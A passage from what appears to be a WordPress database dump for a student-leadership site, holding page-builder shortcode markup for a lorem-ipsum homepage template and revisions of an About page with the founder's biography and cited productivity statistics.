center;\"><span style=\"text-decoration: underline;\"><em><strong>Scientists say your morning mood affects your productivity and relationships for the rest of the day</strong></em></span>. (read the full study <a href=\"https://faculty.wharton.upenn.edu/wp-content/uploads/2013/01/Rothbard-Wilk_AMJ_Final.pdf\">here</a>)</p>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/3\"][vc_single_image image=\"15\" img_size=\"medium\" alignment=\"center\"][vc_column_text]\r\n<p style=\"text-align: center;\"><strong>ACCOUNTABILITY</strong></p>\r\n<p style=\"text-align: center;\"><span style=\"text-decoration: underline;\"><strong>I</strong></span><em style=\"font-weight: bold;\"><span style=\"text-decoration: underline;\"><strong>f</strong> you have a specific accountability appointment, you will increase your chance of success by up to 95%”</span>  </em>(read the full study <a href=\"https://medium.com/the-mission/the-accountability-effect-a-simple-way-to-achieve-your-goals-and-boost-your-performance-8a07c76ef53a#:~:text=The%20American%20Society%20of%20Training,success%20by%20up%20to%2095%25.\">here</a>)</p>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/3\"][vc_single_image image=\"15\" img_size=\"medium\" alignment=\"center\"][vc_column_text]\r\n<p style=\"text-align: center;\"><strong>MINDFULNESS</strong></p>\r\n<p style=\"text-align: center;\"><strong><span style=\"text-decoration: underline;\">Students who meditated had <em>15% better math scores, showed 24% more social behaviours, were 24% less aggressive.</em>..</span></strong> (read the full article <a href=\"https://time.com/3682311/mindfulness-math/\">here</a>)</p>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/3\"][vc_single_image image=\"15\" img_size=\"medium\" alignment=\"center\"][vc_column_text]\r\n<p style=\"text-align: center;\"><strong>GOAL SETTING</strong></p>\r\n<p style=\"text-align: center;\"><strong><em><span style=\"text-decoration: underline;\">You\'re 42 percent more likely to achieve your goals if you write them down.</span>  </em></strong>(read the full study <a href=\"https://braveheartsales.com/wp-content/uploads/Goals-Research-Summary.pdf?x60870\">here</a>)</p>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/3\"][vc_single_image image=\"15\" img_size=\"medium\" alignment=\"center\"][vc_column_text]\r\n<p style=\"text-align: center;\"><strong>SELF-CONFIDENCE</strong></p>\r\n<p style=\"text-align: center;\"><strong><em><span style=\"text-decoration: underline;\">“Setting goals is linked to self-confidence, motivation, and autonomy (Locke &amp; Latham, 2006).”</span>  </em></strong>(read the full study <a href=\"https://www.psychologytoday.com/ca/blog/the-moment-youth/201803/goal-setting-is-linked-higher-achievement\">here</a>)</p>\r\n[/vc_column_text][/vc_column][/vc_row]','About','','inherit','closed','closed','','7-revision-v1','','','2020-10-28 22:16:45','2020-10-28 22:16:45','',7,'http://highperformingstudent.com/2020/10/28/7-revision-v1/',0,'revision','',0),(2071,1,'2020-10-28 22:24:53','2020-10-28 22:24:53','[vc_row full_height=\"yes\" el_id=\"first\" content_width=\"fullwidth\" css=\".vc_custom_1603899826716{padding-top: 237px !important;padding-bottom: 237px !important;}\" fullwidth=\"yes\" row_width=\"fullwidth\"][vc_column][vc_custom_heading text=\"Leadership starts with you\" font_container=\"tag:h2|font_size:4.5rem|text_align:center|color:%23000000|line_height:1em\" google_fonts=\"font_family:Roboto%3A100%2C100italic%2C300%2C300italic%2Cregular%2Citalic%2C500%2C500italic%2C700%2C700italic%2C900%2C900italic|font_style:900%20bold%20regular%3A900%3Anormal\"][vc_custom_heading text=\"Helping students build strong habits, communicate more effectively, and become better leaders.\" font_container=\"tag:p|font_size:1.1em|text_align:center|color:%23000000|line_height:1.1em\" google_fonts=\"font_family:Roboto%3A100%2C100italic%2C300%2C300italic%2Cregular%2Citalic%2C500%2C500italic%2C700%2C700italic%2C900%2C900italic|font_style:500%20bold%20regular%3A500%3Anormal\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1603899245380{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #333333 !important;}\"][vc_column][logos_carousel images=\"2043,2045,2047,2046,2048\" cols=\"5\" logo_max_height=\"60\"][/vc_column][/vc_row][vc_row el_id=\"about\"][vc_column][special_heading title=\"About North\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old. Richard McClintock, looked up one of the more obscure\" margin_bottom=\"65\" text_align=\"center\" color=\"dark\"][vc_row_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Professional Design\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" style=\"centered\" animation_delay=\"300\" text_style=\"fullwidth\" icon=\"fa-desktop\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Retina Ready\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" style=\"centered\" animation_delay=\"500\" text_style=\"fullwidth\" icon=\"fa-comments-o\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"7x24 Support\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" style=\"centered\" animation_delay=\"700\" text_style=\"fullwidth\" icon=\"fa-life-ring\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Clean Coding\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" style=\"centered\" animation_delay=\"900\" text_style=\"fullwidth\" icon=\"fa-flask\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row parallax=\"yes\" el_id=\"what-we-do\" color_scheme=\"white\" bg_overlay=\"dark\" css=\".vc_custom_1405099060231{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i11.jpg?id=536) !important;}\" darken=\"dark\"][vc_column][special_heading title=\"What we do\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old. Richard McClintock, looked up one of the more obscure\" margin_bottom=\"0\" text_align=\"center\" color=\"white\"][north_tabs tabs=\"%5B%7B%22title%22%3A%22Movie%22%2C%22heading%22%3A%22Movie%22%2C%22text%22%3A%22Contrary%20to%20popular%20belief%2C%20Lorem%20Ipsum%20is%20not%20simply%20random%20text.%20It%20has%20roots%20in%20a%20piece%20of%20classical%20Latin%20literature%20from%2045%20BC%2C%20making%20it%20over%202000%20years%20old.%20Rich%20McClintock%20not%20simply.%20There%20are%20many%20variations%20of%20passages%20of%20Lorem%20Ipsum%20available%2C%20but%20the%20majority%20have%20suffered%20alteration%20in%20some%20form.%22%7D%2C%7B%22title%22%3A%22Landing%22%2C%22heading%22%3A%22Landing%22%2C%22text%22%3A%22There%20are%20many%20variations%20of%20passages%20of%20Lorem%20Ipsum%20available%2C%20but%20the%20majority%20have%20suffered%20alteration%20in%20some%20form%2C%20by%20injected%20humour%2C%20or%20randomised%20words%20which%20don%E2%80%99t%20look%20even%20snormally%20believable.%20If%20you%20are%20going%20to%20use%20a%20passage%20of%20Lorem%20Ipsum%2C%20you%20need%20to%20be%20sure%20there%20isn%E2%80%99t%20anything%20embarrassing%20hidden%20in%20the%20middle%20of%20text.%20All%20the%20Lorem%20Ipsum%20generators%20on%20the%20Internet%20tend%20to%20repeat%20predefined%20chunks%20as%20necessary%2C%20making%20this%20the%20first%20true%20generator%20on%20the%20Internet.%20It%20uses%20a%20dictionary%20of%20over%20200%20Latin%20words%2C%20combined%20with%20a%20handful%20of%20model%20sentence%20structures%2C%20to%20generate%20Lorem%20Ipsum%20which%20looks%20reasonable.%20The%20generated%20Lorem%20Ipsum%20is%20therefore%20always%20free%20from%20repetition%2C%20injected%20humour%2C%20or%20non-characteristic%20words%20etc.%22%7D%2C%7B%22title%22%3A%22Design%22%2C%22heading%22%3A%22Design%22%2C%22text%22%3A%22It%20is%20a%20long%20established%20fact%20that%20a%20reader%20will%20be%20distracted%20by%20the%20readable%20content%20of%20a%20page%20when%20looking%20at%20its%20layout.%20The%20point%20of%20using%20Lorem%20Ipsum%20is%20that%20it%20has%20a%20more-or-less%20normal%20distribution%20of%20letters%2C%20as%20opposed%20to%20using%20%E2%80%98Content%20here%2C%20content%20here%E2%80%99%2C%20making%20it%20look%20like%20readable%20English.%22%7D%2C%7B%22title%22%3A%22Art%22%2C%22heading%22%3A%22Art%22%2C%22text%22%3A%22It%20is%20a%20long%20established%20fact%20that%20a%20reader%20will%20be%20distracted%20by%20the%20readable%20content%20of%20a%20page%20when%20looking%20at%20its%20layout.%20The%20point%20of%20using%20Lorem%20Ipsum%20is%20that%20it%20has%20a%20more-or-less%20normal%20distribution%20of%20letters%2C%20as%20opposed%20to%20using%20%E2%80%98Content%20here%2C%20content%20here%E2%80%99%2C%20making%20it%20look%20like%20readable%20English.%22%7D%5D\"][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css_animation=\"left-to-right\"]\n<h1>PARALLAX WITH DEGRADE</h1>\nContrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock not simply.\n\n[list icon=\"caret-right\" color=\"dark\" background=\"yes\"]\n\n[li]There are many variations of passages.<span style=\"color: #ffffff;\">.</span>[/li]\n\n[li]Contrary to popular belief, Lorem Ipsum is not simply random text.[/li]\n\n[li]Finibus Bonorum et Malorum (The Extremes of Good and Evil) by Cicero.[/li]\n\n[li]Finibus Bonorum et Malorum (The Extremes of Good and Evil) by Cicero.<span style=\"color: #ffffff;\">.</span>[/li]\n\n[li]But I must explain to you how all this mistaken idea<span style=\"color: #ffffff;\">.</span>[/li]\n\n[/list]\n\nSed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium dolorem que laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo.\n\n[button label=\"Read More\" url=\"#facts\" color=\"black\" scroll=\"yes\"][/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_single_image image=\"601\" img_size=\"full\" alignment=\"right\" css_animation=\"right-to-left\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row el_id=\"facts\"][vc_column][special_heading title=\"WHAT OUR FUN FACTORS\" margin_bottom=\"0\" color=\"dark\"][vc_row_inner][vc_column_inner width=\"1/4\"][counter title=\"Days Worked\" number=\"640\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Projects Finished\" number=\"1250\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Coffee Cups\" number=\"2040\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Pizza Ordered\" number=\"1620\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row el_id=\"works\" css=\".vc_custom_1406483332545{border-top-width: 1px !important;border-bottom-width: 1px !important;padding-bottom: 50px !important;background-color: #fdfdfd !important;border-color: #eeeeee !important;border-style: solid !important;}\"][vc_column][special_heading title=\"Our Portfolio\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old.\" animated=\"no\" margin_bottom=\"0\" color=\"dark\"][portfolio_grid cats=\"branding,design,photography,video\" posts_nr=\"9\" more_url=\"http://veented.com/themes/north/portfolio/\" style=\"default\" paged_posts=\"no\" thumb_style=\"alt\" fullwidth=\"no\"][/vc_column][/vc_row][vc_row el_id=\"team\"][vc_column][special_heading title=\"Our Creative Team\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" animated=\"no\" margin_bottom=\"0\" color=\"dark\"][team_carousel][/vc_column][/vc_row][vc_row parallax=\"yes\" el_id=\"features\" color_scheme=\"white\" bg_overlay=\"dark\" css=\".vc_custom_1405099363182{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i21.jpg?id=537) !important;}\" darken=\"dark\"][vc_column][special_heading title=\"Features With Mobile\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical. There are many variations of passages of Lorem Ipsum available.\" margin_bottom=\"60\" color=\"dark\"][vc_row_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1406709465308{padding-top: 60px !important;}\"][icon_box title=\"Analystic\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" style=\"right\" animation_delay=\"200\" icon=\"fa-camera-retro\"][icon_box title=\"Web Design\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" style=\"right\" animation_delay=\"400\" icon=\"fa-cog\"][/vc_column_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1405423153057{padding-right: 0px !important;padding-left: 0px !important;}\"][vc_single_image image=\"606\" img_size=\"full\" alignment=\"center\" css=\".vc_custom_1405099308623{margin-bottom: -250px !important;}\"][/vc_column_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1406709472224{padding-top: 60px !important;}\"][icon_box title=\"Wordpress\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" style=\"left\" animation_delay=\"200\" icon=\"fa-desktop\"][icon_box title=\"Graphic\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" style=\"left\" animation_delay=\"400\" icon=\"fa-paper-plane-o\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1406709610245{padding-top: 100px !important;padding-bottom: 100px !important;}\"][vc_column][/vc_column][/vc_row][vc_row parallax=\"yes\" bg_overlay=\"dark\" css=\".vc_custom_1410480231107{padding-top: 0px !important;background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/06/testimonials-1.jpg?id=924) !important;}\"][vc_column][testimonials posts_nr=\"4\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1404037588724{padding-bottom: 70px !important;}\"][vc_column][special_heading title=\"What Clients Says\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"0\" color=\"dark\"][testimonials style=\"expanded\" posts_nr=\"4\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1403955268505{margin-bottom: -15px !important;padding-bottom: 0px !important;}\"][vc_column][special_heading title=\"WHY DO YOU CHOOSE NORTH?\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"0\" color=\"dark\"][/vc_column][/vc_row][vc_row el_id=\"what-we\" css=\".vc_custom_1409759211052{padding-bottom: 80px !important;}\"][vc_column width=\"1/2\"][vc_tabs][vc_tab title=\"Design\" tab_id=\"1403954748-1-96f2de-a384\"][vc_column_text]<a href=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone.png\"><img class=\"size-full wp-image-926 alignleft\" src=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone.png\" alt=\"mini-phone\" width=\"164\" height=\"116\" /></a>Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][vc_tab title=\"Company\" tab_id=\"1403954748-2-63f2de-a384\"][vc_column_text]<a href=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone1.png\"><img class=\"size-full wp-image-927 alignright\" src=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone1.png\" alt=\"mini-phone1\" width=\"130\" height=\"165\" /></a>Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][vc_tab title=\"Support\" tab_id=\"1405423831831-2-6\"][vc_column_text]Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][/vc_tabs][/vc_column][vc_column width=\"1/2\"][vc_accordion][vc_accordion_tab title=\"Awesome Design\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][vc_accordion_tab title=\"Improved Documentation\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][vc_accordion_tab title=\"Clean Coded\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][/vc_accordion][/vc_column][/vc_row][vc_row parallax=\"yes\" color_scheme=\"white\" bg_overlay=\"dark\" content_width=\"fullwidth\" css=\".vc_custom_1405099662664{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i31.jpg?id=538) !important;}\" darken=\"dark\" fullwidth=\"yes\"][vc_column][special_heading title=\"Our Featured Works\" subtitle=\"CONTRARY TO POPULAR BELIEF, LOREM IPSUM IS NOT SIMPLY RANDOM TEXT. IT HAS ROOTS IN PIECE OF CLASSICAL. THERE ARE MANY VARIATIONS OF PASSAGES OF LOREM IPSUM AVAILABLE.\" color=\"dark\"][portfolio_carousel cats=\"branding,design,photography,video\" thumb_style=\"alt\"][cta heading=\"super responsive, clean and creative theme\" subtitle=\"This is Photoshop\'s version of Lorem Ipsum. Proin gravida nibh vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum.\" button1_title=\"Our Portfolio\" button1_subtitle=\"click for our all works\" button1_url=\"#works\" button2_title=\"Keep in Touch\" button2_subtitle=\"send us a message\" button2_url=\"#contact\" style=\"centered\" button_color=\"white\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1403956257324{background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\"][vc_column][special_heading title=\"Our Skills\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"60\" color=\"dark\"][vc_row_inner][vc_column_inner width=\"1/2\"][vc_progress_bar values=\"55|Design,85|Wordpress,75|HTML&amp;CSS\" bgcolor=\"bar_black\" units=\"%\"][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_progress_bar values=\"70|Photography,75|Web Design,80|Photoshop\" bgcolor=\"bar_black\" units=\"%\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row parallax=\"yes\" el_id=\"services\" bg_overlay=\"light\" css=\".vc_custom_1405099917341{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i41.jpg?id=539) !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\" darken=\"light\"][vc_column][special_heading title=\"OUR SERVICES\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia.\" color=\"dark\"][services_carousel posts_nr=\"5\"][/vc_column][/vc_row][vc_row parallax=\"yes\" el_id=\"prices\" color_scheme=\"white\" bg_overlay=\"darker\" css=\".vc_custom_1405099958560{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i51.jpg?id=540) !important;}\" darken=\"light\"][vc_column][special_heading title=\"Our Pricing Tables\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"60\" color=\"dark\"][vc_row_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Starter\" price=\"$19\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Standard\" price=\"$39\" animation_delay=\"300\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Professional\" price=\"$59\" featured=\"yes\" animation_delay=\"500\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Platinum\" price=\"$79\" animation_delay=\"700\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row bg_overlay=\"light\" css=\".vc_custom_1404125302141{padding-bottom: 70px !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\" darken=\"light\"][vc_column][special_heading title=\"Keep in Touch\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" color=\"dark\"][vntd_contact_form id=\"417\" email=\"prafgon@gmail.com\" label_name=\"Please enter your Name\" label_email=\"Please enter your E-Mail\" label_subject=\"Please enter your Subject\" label_message=\"Please enter your Message\" label_submit=\"Send E-Mail\"][/vc_column][/vc_row][vc_row parallax=\"yes\" el_id=\"contact\" bg_overlay=\"darker\" css=\".vc_custom_1405424323297{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i51.jpg?id=540) !important;}\"][vc_column][contact_block address=\"NORTH, STREET NAME 6209, MELBOURNE AUSTRALIA\" email=\"SUPPORT@GOLDEYESTHEME.COM\" facebook=\"#\" twitter=\"#\" linkedin=\"#\" youtube=\"#\"][/vc_column][/vc_row][vc_row content_width=\"fullwidth\" css=\".vc_custom_1405425125857{padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column][gmap marker1_location=\"custom\" marker1_location_custom=\"41.863774,-87.721328\" marker2_title=\"Our other store\"][/vc_column][/vc_row]','homepage','','publish','closed','closed','','homepage','','','2020-10-28 22:24:53','2020-10-28 22:24:53','',0,'http://highperformingstudent.com/templatera/homepage/',0,'templatera','',0),(2072,1,'2020-10-28 22:25:02','2020-10-28 22:25:02','[vc_row][vc_column width=\"1/6\"][/vc_column][vc_column width=\"2/3\"][vc_custom_heading text=\"OUR MISSION\" font_container=\"tag:h1|font_size:4.5rem|text_align:center|color:%23333333|line_height:1.5\" google_fonts=\"font_family:Roboto%3A100%2C100italic%2C300%2C300italic%2Cregular%2Citalic%2C500%2C500italic%2C700%2C700italic%2C900%2C900italic|font_style:900%20bold%20regular%3A900%3Anormal\"][vc_column_text]\r\n<p style=\"text-align: center;\">Help students build strong habits, communicate more effectively and become better leaders.  We accomplish this through our <a href=\"http://highperformingstudent.com/podcast/\">podcast</a>, <a href=\"http://highperformingstudent.com/book/\">book</a>, <a href=\"http://highperformingstudent.com/speaking/\">self-leadership seminars</a>, and <a href=\"http://highperformingstudent.com/courses/\">online courses</a>.</p>\r\n<!-- /wp:paragraph -->[/vc_column_text][/vc_column][vc_column width=\"1/6\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"double\" border_width=\"3\"][/vc_column][/vc_row][vc_row content_placement=\"middle\"][vc_column width=\"1/2\"][vc_custom_heading text=\"OUR FOUNDER\" font_container=\"tag:h1|font_size:4.5rem|text_align:center|color:%23333333|line_height:1.5\" google_fonts=\"font_family:Roboto%3A100%2C100italic%2C300%2C300italic%2Cregular%2Citalic%2C500%2C500italic%2C700%2C700italic%2C900%2C900italic|font_style:900%20bold%20regular%3A900%3Anormal\"][vc_column_text]At 21 years old, entrepreneur, youth coach, and keynote speaker Sam Demma doesn’t let his age define his drive or credibility.  His goal is to provide students with the tools and strategies they need to become the change-makers in their schools, businesses, communities, and in the lives of those around them.  And it all started with…garbage.  At the age of 17, he co-founded <a href=\"http://www.pickwaste.com\">PickWaste</a>, a grassroots initiative that brings people together to pick up trash in their communities.  After filling nearly 2000 bags of litter, Sam was convinced that small actions can have a big impact, and he lives that message in all he does.\r\n\r\nIn a few short years, his presentations have reached thousands of students across Canada and his programs have made a difference for young people in 6 countries around the world.  He’s delivered two <a href=\"https://www.ted.com/talks/sam_demma_small_consistent_actions\">TEDx talks</a>, he is the youngest Professional member of the Canadian Association of Professional Speakers, and there’s no limit to where small actions will take this big thinker.[/vc_column_text][button label=\"More About Sam\" size=\"large\" align=\"center\" url=\"www.samdemma.com\" undefined=\"\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"2052\" img_size=\"full\" alignment=\"center\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"double\" border_width=\"3\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/6\"][/vc_column][vc_column width=\"2/3\"][vc_custom_heading text=\"THE RESEARCH\" font_container=\"tag:h1|font_size:4.5rem|text_align:center|color:%23333333|line_height:1.5\" google_fonts=\"font_family:Roboto%3A100%2C100italic%2C300%2C300italic%2Cregular%2Citalic%2C500%2C500italic%2C700%2C700italic%2C900%2C900italic|font_style:900%20bold%20regular%3A900%3Anormal\"][vc_column_text]\r\n<p style=\"text-align: center;\">All of our programs and initiatives are built on evidence-based research.  Of course, we walk students through the \"how\", but more importantly, we explain the \"why\".  Giving your students a strong reason to act on the information is our obsession.</p>\r\n<!-- /wp:paragraph -->[/vc_column_text][/vc_column][vc_column width=\"1/6\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/3\"][vc_single_image image=\"13\" img_size=\"medium\" alignment=\"center\"][vc_column_text]\r\n<p style=\"text-align: center;\"><strong>VISON</strong></p>\r\n<p style=\"text-align: center;\"><em><strong><span style=\"text-decoration: underline;\">What you focus on is sought out by your Reticular Activating System.</span> </strong></em>(Learn more from the University of Minnesota <a href=\"https://extension.umn.edu/two-you-video-series/ras\">here</a>)</p>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/3\"][vc_single_image image=\"13\" img_size=\"medium\" alignment=\"center\"][vc_column_text]\r\n<p style=\"text-align: center;\"><strong>ROUTINES</strong></p>\r\n<p style=\"text-align: center;\"><span style=\"text-decoration: underline;\"><em><strong>Scientists say your morning mood affects your productivity and relationships for the rest of the day</strong></em></span>. (read the full study <a href=\"https://faculty.wharton.upenn.edu/wp-content/uploads/2013/01/Rothbard-Wilk_AMJ_Final.pdf\">here</a>)</p>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/3\"][vc_single_image image=\"13\" img_size=\"medium\" alignment=\"center\"][vc_column_text]\r\n<p style=\"text-align: center;\"><strong>ACCOUNTABILITY</strong></p>\r\n<p style=\"text-align: center;\"><span style=\"text-decoration: underline;\"><strong>I</strong></span><em style=\"font-weight: bold;\"><span style=\"text-decoration: underline;\"><strong>f</strong> you have a specific accountability appointment, you will increase your chance of success by up to 95%”</span>  </em>(read the full study <a href=\"https://medium.com/the-mission/the-accountability-effect-a-simple-way-to-achieve-your-goals-and-boost-your-performance-8a07c76ef53a#:~:text=The%20American%20Society%20of%20Training,success%20by%20up%20to%2095%25.\">here</a>)</p>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/3\"][vc_single_image image=\"13\" img_size=\"medium\" alignment=\"center\"][vc_column_text]\r\n<p style=\"text-align: center;\"><strong>MINDFULNESS</strong></p>\r\n<p style=\"text-align: center;\"><strong><span style=\"text-decoration: underline;\">Students who meditated had <em>15% better math scores, showed 24% more social behaviours, were 24% less aggressive.</em>..</span></strong> (read the full article <a href=\"https://time.com/3682311/mindfulness-math/\">here</a>)</p>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/3\"][vc_single_image image=\"13\" img_size=\"medium\" alignment=\"center\"][vc_column_text]\r\n<p style=\"text-align: center;\"><strong>GOAL SETTING</strong></p>\r\n<p style=\"text-align: center;\"><strong><em><span style=\"text-decoration: underline;\">You\'re 42 percent more likely to achieve your goals if you write them down.</span>  </em></strong>(read the full study <a href=\"https://braveheartsales.com/wp-content/uploads/Goals-Research-Summary.pdf?x60870\">here</a>)</p>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/3\"][vc_single_image image=\"13\" img_size=\"medium\" alignment=\"center\"][vc_column_text]\r\n<p style=\"text-align: center;\"><strong>SELF-CONFIDENCE</strong></p>\r\n<p style=\"text-align: center;\"><strong><em><span style=\"text-decoration: underline;\">“Setting goals is linked to self-confidence, motivation, and autonomy (Locke &amp; Latham, 2006).”</span>  </em></strong>(read the full study <a href=\"https://www.psychologytoday.com/ca/blog/the-moment-youth/201803/goal-setting-is-linked-higher-achievement\">here</a>)</p>\r\n[/vc_column_text][/vc_column][/vc_row]','About','','inherit','closed','closed','','7-revision-v1','','','2020-10-28 22:25:02','2020-10-28 22:25:02','',7,'http://highperformingstudent.com/2020/10/28/7-revision-v1/',0,'revision','',0),(2073,1,'2020-10-28 22:31:10','2020-10-28 22:31:10','[vc_row parallax=\"yes\" el_id=\"features\" color_scheme=\"custom\" darken=\"dark\" css=\".vc_custom_1603924265428{padding-bottom: 100px !important;background-color: #ffffff !important;}\"][vc_column][vc_custom_heading text=\"High Performing Student Podcast\" font_container=\"tag:h2|font_size:4.5rem|text_align:center|color:%23333333|line_height:1.5em\" 